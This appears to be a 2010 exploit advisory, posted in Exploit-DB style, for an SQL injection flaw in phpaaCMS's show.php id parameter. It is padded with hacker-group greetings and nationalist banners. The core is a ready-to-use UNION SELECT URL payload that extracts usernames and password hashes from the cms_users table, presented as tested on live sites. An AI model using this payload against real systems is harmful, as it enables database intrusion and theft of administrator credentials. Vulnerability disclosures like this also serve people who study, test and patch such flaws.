#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       Gr33tz to  All PakISTANI Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++



----- [ Founder ] -----

    Shafiq-Ur-rehman

----- [ Email] -----

    aol.shafiq@gmail.com


 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 {{{{TITLE}}}

PHPAA (show.php) Sql injection Vulnerable

+++++[ Vendor ]+++++

http://www.phpaa.cn


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


----- [ SQL Injection ] -----

Put [SQL CODE]

[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]



             {Tested On}

----- [ Live Link (s) ] -----

[SQLi] http://<server>/show.php?id=1[CODE]

[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     >>Live Long Pakistan<<

>>> Live Long Azad Kashmir<<<

>>> Proude To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010